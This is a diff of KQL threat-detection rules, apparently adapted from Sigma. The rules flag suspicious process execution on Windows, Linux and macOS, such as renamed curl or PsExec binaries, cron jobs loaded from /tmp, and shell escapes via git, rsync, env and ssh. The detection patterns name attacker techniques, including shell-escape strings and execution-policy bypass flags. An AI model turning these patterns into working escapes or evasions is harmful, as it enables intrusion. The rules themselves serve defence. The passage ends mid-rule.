b/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql @@ -1,12 +1,12 @@ -// Title: Remote PowerShell Session Host Process (WinRM) -// Author: Roberto Rodriguez @Cyb3rWard0g -// Date: 2019-09-12 -// Level: medium -// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). -// MITRE Tactic: Execution -// Tags: attack.execution, attack.lateral-movement, attack.t1059.001, attack.t1021.006 -// False Positives: -// - Legitimate usage of remote Powershell, e.g. for monitoring purposes. - -DeviceProcessEvents +// Title: Remote PowerShell Session Host Process (WinRM) +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-09-12 +// Level: medium +// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1059.001, attack.t1021.006 +// False Positives: +// - Legitimate usage of remote Powershell, e.g. for monitoring purposes. + +DeviceProcessEvents | where FolderPath endswith "\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_curl_exe_execution.kql b/KQL/rules/Execution/renamed_curl_exe_execution.kql index be3e657b..463a23f7 100644 --- a/KQL/rules/Execution/renamed_curl_exe_execution.kql +++ b/KQL/rules/Execution/renamed_curl_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed CURL.EXE Execution -// Author: X__Junior (Nextron Systems) -// Date: 2023-09-11 -// Level: medium -// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Renamed CURL.EXE Execution +// Author: X__Junior (Nextron Systems) +// Date: 2023-09-11 +// Level: medium +// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl")) \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_ftp_exe_execution.kql b/KQL/rules/Execution/renamed_ftp_exe_execution.kql index a5133238..4110a5a5 100644 --- a/KQL/rules/Execution/renamed_ftp_exe_execution.kql +++ b/KQL/rules/Execution/renamed_ftp_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed FTP.EXE Execution -// Author: Victor Sergeev, oscd.community -// Date: 2020-10-09 -// Level: medium -// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Renamed FTP.EXE Execution +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_jusched_exe_execution.kql b/KQL/rules/Execution/renamed_jusched_exe_execution.kql index bffe87f0..5f70c8ee 100644 --- a/KQL/rules/Execution/renamed_jusched_exe_execution.kql +++ b/KQL/rules/Execution/renamed_jusched_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed Jusched.EXE Execution -// Author: Markus Neis, Swisscom -// Date: 2019-06-04 -// Level: high -// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1036.003 - -DeviceProcessEvents +// Title: Renamed Jusched.EXE Execution +// Author: Markus Neis, Swisscom +// Date: 2019-06-04 +// Level: high +// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1036.003 + +DeviceProcessEvents | where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_nircmd_exe_execution.kql b/KQL/rules/Execution/renamed_nircmd_exe_execution.kql index 7595782e..c1b2c172 100644 --- a/KQL/rules/Execution/renamed_nircmd_exe_execution.kql +++ b/KQL/rules/Execution/renamed_nircmd_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed NirCmd.EXE Execution -// Author: X__Junior (Nextron Systems) -// Date: 2024-03-11 -// Level: high -// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Renamed NirCmd.EXE Execution +// Author: X__Junior (Nextron Systems) +// Date: 2024-03-11 +// Level: high +// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql b/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql index 5e8b56e3..1d5d21f5 100644 --- a/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql +++ b/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed PingCastle Binary Execution -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2024-01-11 -// Level: high -// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Renamed PingCastle Binary Execution +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2024-01-11 +// Level: high +// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_psexec_service_execution.kql b/KQL/rules/Execution/renamed_psexec_service_execution.kql index 8cf3205d..4f6d2b2d 100644 --- a/KQL/rules/Execution/renamed_psexec_service_execution.kql +++ b/KQL/rules/Execution/renamed_psexec_service_execution.kql @@ -1,12 +1,12 @@ -// Title: Renamed PsExec Service Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-07-21 -// Level: high -// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Legitimate administrative tasks - -DeviceProcessEvents +// Title: Renamed PsExec Service Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate administrative tasks + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" and (not(FolderPath =~ "C:\\Windows\\PSEXESVC.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/ruby_inline_command_execution.kql b/KQL/rules/Execution/ruby_inline_command_execution.kql index 4ad30b7c..5ae3f71a 100644 --- a/KQL/rules/Execution/ruby_inline_command_execution.kql +++ b/KQL/rules/Execution/ruby_inline_command_execution.kql @@ -1,10 +1,10 @@ -// Title: Ruby Inline Command Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-02 -// Level: medium -// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Ruby Inline Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: medium +// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where ProcessCommandLine contains " -e" and (FolderPath endswith "\\ruby.exe" or ProcessVersionInfoOriginalFileName =~ "ruby.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/scheduled_cron_task_job_linux.kql b/KQL/rules/Execution/scheduled_cron_task_job_linux.kql index 779f7ee4..bf4850ee 100644 --- a/KQL/rules/Execution/scheduled_cron_task_job_linux.kql +++ b/KQL/rules/Execution/scheduled_cron_task_job_linux.kql @@ -1,12 +1,12 @@ -// Title: Scheduled Cron Task/Job - Linux -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-06 -// Level: medium -// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Scheduled Cron Task/Job - Linux +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains "/tmp/" and FolderPath endswith "crontab" \ No newline at end of file diff --git a/KQL/rules/Execution/scheduled_cron_task_job_macos.kql b/KQL/rules/Execution/scheduled_cron_task_job_macos.kql index 64b63d10..639e1618 100644 --- a/KQL/rules/Execution/scheduled_cron_task_job_macos.kql +++ b/KQL/rules/Execution/scheduled_cron_task_job_macos.kql @@ -1,12 +1,12 @@ -// Title: Scheduled Cron Task/Job - MacOs -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-06 -// Level: medium -// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Scheduled Cron Task/Job - MacOs +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/crontab" \ No newline at end of file diff --git a/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql b/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql index 49a6d73a..c12084fd 100644 --- a/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql +++ b/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql @@ -1,13 +1,13 @@ -// Title: Scheduled Task Creation Via Schtasks.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2019-01-16 -// Level: low -// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u -// False Positives: -// - Administrative activity -// - Software installation - -DeviceProcessEvents +// Title: Scheduled Task Creation Via Schtasks.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2019-01-16 +// Level: low +// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u +// False Positives: +// - Administrative activity +// - Software installation + +DeviceProcessEvents | where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains "Microsoft\\Office\\Office Performance Monitor" and (FolderPath in~ ("C:\\Windows\\System32\\schtasks.exe", "C:\\Windows\\SysWOW64\\schtasks.exe")) and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Execution/script_event_consumer_spawning_process.kql b/KQL/rules/Execution/script_event_consumer_spawning_process.kql index ecf4fcf9..3e9938a2 100644 --- a/KQL/rules/Execution/script_event_consumer_spawning_process.kql +++ b/KQL/rules/Execution/script_event_consumer_spawning_process.kql @@ -1,10 +1,10 @@ -// Title: Script Event Consumer Spawning Process -// Author: Sittikorn S -// Date: 2021-06-21 -// Level: high -// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe). -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Script Event Consumer Spawning Process +// Author: Sittikorn S +// Date: 2021-06-21 +// Level: high +// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msbuild.exe") and InitiatingProcessFolderPath endswith "\\scrcons.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql b/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql index 1c970738..e4b4bf3c 100644 --- a/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql +++ b/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql @@ -1,10 +1,10 @@ -// Title: Script Interpreter Execution From Suspicious Folder -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-02-08 -// Level: high -// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Script Interpreter Execution From Suspicious Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-02-08 +// Level: high +// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where ((ProcessCommandLine contains " -ep bypass " or ProcessCommandLine contains " -ExecutionPolicy bypass " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains "/e:javascript " or ProcessCommandLine contains "/e:Jscript " or ProcessCommandLine contains "/e:vbscript ") or (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "mshta.exe", "wscript.exe"))) and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql index 15bca231..45f4628f 100644 --- a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql @@ -1,13 +1,13 @@ -// Title: Service Reconnaissance Via Wmic.EXE -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-14 -// Level: medium -// Description: An adversary might use WMI to check if a certain remote service is running on a remote device. -// When the test completes, a service information will be displayed on the screen if it exists. -// A common feedback message is that "No instance(s) Available" if the service queried is not running. -// A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Service Reconnaissance Via Wmic.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-14 +// Level: medium +// Description: An adversary might use WMI to check if a certain remote service is running on a remote device. +// When the test completes, a service information will be displayed on the screen if it exists. +// A common feedback message is that "No instance(s) Available" if the service queried is not running. +// A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where ProcessCommandLine contains "service" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql b/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql index 0a722440..91f18f10 100644 --- a/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql +++ b/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Service Started/Stopped Via Wmic.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-20 -// Level: medium -// Description: Detects usage of wmic to start or stop a service -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Service Started/Stopped Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects usage of wmic to start or stop a service +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where ((ProcessCommandLine contains "stopservice" or ProcessCommandLine contains "startservice") and (ProcessCommandLine contains " service " and ProcessCommandLine contains " call ")) and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql b/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql index 978851f5..fbe44881 100644 --- a/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql +++ b/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql @@ -1,12 +1,12 @@ -// Title: Service StartupType Change Via PowerShell Set-Service -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-04 -// Level: medium -// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1562.001 -// False Positives: -// - False positives may occur with troubleshooting scripts - -DeviceProcessEvents +// Title: Service StartupType Change Via PowerShell Set-Service +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-04 +// Level: medium +// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1562.001 +// False Positives: +// - False positives may occur with troubleshooting scripts + +DeviceProcessEvents | where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE") \ No newline at end of file diff --git a/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql b/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql index d6155e69..d92aec12 100644 --- a/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql +++ b/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql @@ -1,12 +1,12 @@ -// Title: Service StartupType Change Via Sc.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-01 -// Level: medium -// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1562.001 -// False Positives: -// - False positives may occur with troubleshooting scripts - -DeviceProcessEvents +// Title: Service StartupType Change Via Sc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: medium +// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1562.001 +// False Positives: +// - False positives may occur with troubleshooting scripts + +DeviceProcessEvents | where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql b/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql index cd79de2f..da13dec7 100644 --- a/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql +++ b/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql @@ -1,10 +1,10 @@ -// Title: Shell Execution Of Process Located In Tmp Directory -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: high -// Description: Detects execution of shells from a parent process located in a temporary (/tmp) directory -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Shell Execution Of Process Located In Tmp Directory +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: high +// Description: Detects execution of shells from a parent process located in a temporary (/tmp) directory +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and InitiatingProcessFolderPath startswith "/tmp/" \ No newline at end of file diff --git a/KQL/rules/Execution/shell_execution_via_git_linux.kql b/KQL/rules/Execution/shell_execution_via_git_linux.kql index fe7759bb..2eadafa8 100644 --- a/KQL/rules/Execution/shell_execution_via_git_linux.kql +++ b/KQL/rules/Execution/shell_execution_via_git_linux.kql @@ -1,10 +1,10 @@ -// Title: Shell Execution via Git - Linux -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) -// Date: 2024-09-02 -// Level: high -// Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Shell Execution via Git - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where (ProcessCommandLine contains "bash 0<&1" or ProcessCommandLine contains "dash 0<&1" or ProcessCommandLine contains "sh 0<&1") and (InitiatingProcessCommandLine contains " -p " and InitiatingProcessCommandLine contains "help") and InitiatingProcessFolderPath endswith "/git" \ No newline at end of file diff --git a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql index aee469f9..fa87938e 100644 --- a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql +++ b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql @@ -1,12 +1,12 @@ -// Title: Shell Execution via Rsync - Linux -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth -// Date: 2024-09-02 -// Level: high -// Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate cases in which "rsync" is used to execute a shell - -DeviceProcessEvents +// Title: Shell Execution via Rsync - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate cases in which "rsync" is used to execute a shell + +DeviceProcessEvents | where (ProcessCommandLine contains "/ash " or ProcessCommandLine contains "/bash " or ProcessCommandLine contains "/dash " or ProcessCommandLine contains "/csh " or ProcessCommandLine contains "/sh " or ProcessCommandLine contains "/zsh " or ProcessCommandLine contains "/tcsh " or ProcessCommandLine contains "/ksh " or ProcessCommandLine contains "'ash " or ProcessCommandLine contains "'bash " or ProcessCommandLine contains "'dash " or ProcessCommandLine contains "'csh " or ProcessCommandLine contains "'sh " or ProcessCommandLine contains "'zsh " or ProcessCommandLine contains "'tcsh " or ProcessCommandLine contains "'ksh ") and (ProcessCommandLine contains " -e " and (FolderPath endswith "/rsync" or FolderPath endswith "/rsyncd")) \ No newline at end of file diff --git a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql index d7349c88..6c1e49de 100644 --- a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql +++ b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql @@ -1,12 +1,12 @@ -// Title: Shell Invocation via Env Command - Linux -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) -// Date: 2024-09-02 -// Level: high -// Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Github operations such as ghe-backup - -DeviceProcessEvents +// Title: Shell Invocation via Env Command - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Github operations such as ghe-backup + +DeviceProcessEvents | where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/env" \ No newline at end of file diff --git a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql index 885ca822..a89ce264 100644 --- a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql +++ b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql @@ -1,10 +1,10 @@ -// Title: Shell Invocation Via Ssh - Linux -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) -// Date: 2024-08-29 -// Level: high -// Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Shell Invocation Via Ssh - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg 